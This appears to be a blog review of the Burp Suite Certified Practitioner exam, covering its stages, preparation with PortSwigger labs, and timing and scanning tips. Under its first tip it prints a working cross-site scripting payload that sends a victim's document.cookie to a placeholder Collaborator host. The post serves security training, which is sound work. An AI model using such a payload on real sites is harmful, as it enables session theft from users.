The following post is a review of the Burp Suite Certified Practitioner certification, its key learnings, and how to prepare for the exam. This post contains no spoilers and only guides people on what to expect from the certification. All information in the post is publicly mentioned on the PortSwigger website.
Information about the exam and who should take it
The exam costs $99 per attempt and requires you to solve 2 real-world applications (6/6 stages) within a 4-hour timeframe. PortSwigger has collaborated with Examly for proctoring the exam. This exam is for students, bug bounty hunters, or experienced professionals who want to demonstrate their web security knowledge and Burp skills.
This certification does not exactly reflect your proficiency with Burp Suite; it tests your web application pentest skills and how Burp can be leveraged to find these issues.
The exam format
There are three stages in each of the 2 applications to test:
Stage 1: Access any user account.
Stage 2: Use your user account to access the admin interface at /admin, perhaps by elevating your privileges or compromising the administrator account.
Stage 3: Use the admin interface to read the contents of /home/carlos/secret from the server’s filesystem, and submit it using “submit solution”.
You need to clear all 6/6 stages for both applications to pass.
Note: The stages must be solved sequentially. You cannot skip directly to stage 2 (the administrator account); you first need to solve stage 1 (obtaining a user account, generally carlos) in order to reach the endpoints used for privilege escalation.
Preparing for Exam
There are various materials and free labs provided by PortSwigger to help you study for the exam. Once you create an account on PortSwigger, you will be presented with a dashboard at https://portswigger.net/web-security/dashboard which highlights your learning progress.
Portswigger Labs
At the time of writing this post, there are about 210 lab challenges in PortSwigger Labs. They cover 22 vulnerability topics, grouped into categories such as Server-side topics, Client-side topics, and Advanced topics. These labs reflect real-world findings during pentests.
Learning Path – https://portswigger.net/web-security/learning-path
Practice Exam
Once you've gone through every Apprentice and Practitioner lab, head over to https://portswigger.net/web-security/certification/how-it-works#what-the-exam-involves and read the guide.
It is essential to take the practice exam, as it simulates the real exam environment and prepares you for what to expect at each stage. You can take the practice exam as many times as you want. Once you have started the practice exam, you can head back and observe the time remaining and the stages completed for that particular machine. This is quite handy in the exam, where multiple things are tried and you want to see whether you were successful in passing a particular stage.
Tips for exam:
Tip 1: Open a note-taking application or Microsoft Excel to prepare a table of all lab solutions.
After you have completed all the labs, or have the necessary knowledge to take the exam, open each lab and note down its solution in the table. This will help you cross-reference all vulnerabilities and their solutions in a short period. Make sure you have documented all exploit code that can be reused against the exam applications.
For example, the fetch function in JavaScript is handy for generating exploit code to steal cookies via Cross-Site Scripting, and it can be stored as follows:
Steal cookies collaborator:
<script>
fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: document.cookie});
</script>
Steal Cookies Exploit Server:
Here is an example on how to store solutions and exploits in notion tables:
Tip 2: This exam relies more on your speed than on complete exploitation
You need to complete 100% of the exam, i.e. solve 6/6 stages, to get certified. Hence it is necessary to practice labs where you need to deliver an exploit to the victim, create exploit scripts, use the email functionality, etc., so that you don't spend unnecessary time understanding these key concepts in every application.
Don't overcomplicate any stage or go too deep down a rabbit hole. Please note that these applications are intentionally vulnerable and can be solved easily. Just think about the most basic thing that could have been done here and tweak it a bit to get the necessary outcome.
Keep an eye on your time: you have approximately 40 minutes for each stage.
Tip 3: Each stage can be cross-referenced to the types of vulnerabilities you can expect.
Objective for Stage 1: Get any user access
Description: Black-box pentest of the application to gain authenticated access as any one user
Examples:
- SQL Injection
- Cross-Site Scripting
- Authentication / Credentials Brute force
- Request Smuggling
- Web Cache Poisoning
Objective for Stage 2: Get Admin access
Description: Any vulnerability that leverages features only accessible to an authenticated user, or privilege escalation to administrator
Examples:
- SQL Injection
- Cross-Site Scripting
- Cross-Site Request Forgery
- HTTP Host header attacks
- Server-Side Request Forgery
- Access Control vulnerabilities
- Authentication / Credentials Brute force
Objective for Stage 3: Read Contents of ‘/home/carlos/secret’
Description: Any vulnerabilities that can execute code on the server or read files on the server
Examples:
- XML External Entities
- SQL Injection
- Command Injection
- Server-Side Template Injection
- Path Traversal
- File Upload attacks
- Insecure Deserialization
Tip 4: Do not tamper with existing accounts or files on server
There is no reset option that allows you to restart a lab. PortSwigger has mentioned this clearly in the FAQ, so tampering with accounts or files will waste your attempt.
Tip 5: Scan all the way
There is no restriction on the types of tools you can use for testing the applications, so you can use as many tools as you like. Although this is not appropriate for real pentests, where testing has to be restricted to the agreed environment, here you have the freedom to use anything that works for you. This tip exists because of the time restriction: it is quite difficult to figure out the underlying vulnerability in a short time frame. Start the Burp active scan and a few extensions such as Param Miner as soon as you are onboarded to a lab. But again, use them on endpoints that don't modify any data, or you could end up changing something that crashes the server and wastes your attempt.
Tools or things to get familiar with:
Final Thoughts:
The certification is not just an exam but a learning experience with hands-on vulnerability discovery and prevention. The certification price is relatively cheap compared to others, so it is nice to have under your belt. The free labs provided by PortSwigger make it easier for people to learn what is in store for them. As there is no restriction on the tools used, the exam allows you to explore all possibilities and could improve your thinking in real pentests.
Overall, it's a well put-together challenge that lets users explore multiple exploitation techniques across the majority of web application vulnerability classes. The PortSwigger team provides valuable knowledge with its tools, labs, and research. I would recommend everyone take this up as a challenge.
My certificate: https://portswigger.net/web-security/e/c/4a553bc932e15d80